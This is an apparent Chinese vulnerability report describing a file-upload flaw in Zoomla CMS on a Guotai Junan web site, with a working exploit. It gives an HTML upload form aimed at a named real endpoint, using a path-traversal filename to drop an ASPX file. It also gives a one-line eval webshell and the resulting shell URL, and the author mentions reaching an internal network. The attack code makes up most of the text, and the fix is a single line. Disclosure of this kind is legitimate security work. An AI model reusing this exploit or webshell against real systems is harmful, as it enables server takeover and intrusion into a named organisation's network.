国泰君安某站点 文件上传getshell
这站点采用的是逐浪cms 然后发现这套系统存在上传漏洞
然后顺利拿下此站点 发现存在内网 但是没进行渗透了 危害性应该算比较大吧
漏洞利用代码
<html><body><form. action="http://jxkh.gtja.com/Common/FileService.aspx" method="post"enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="Filedata" id="file" /> <br /><input type="hidden" name="fileName" value="../1.aspx" /><input type="submit" name="submit" value="Submit" /></form></body></html>
利用此代码 上传图片格式的木马 比如1.jpg
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
上传后木马地址
http://jxkh.gtja.com/uploadfiles/1.aspx
修复方案:
对上传文件名进行限制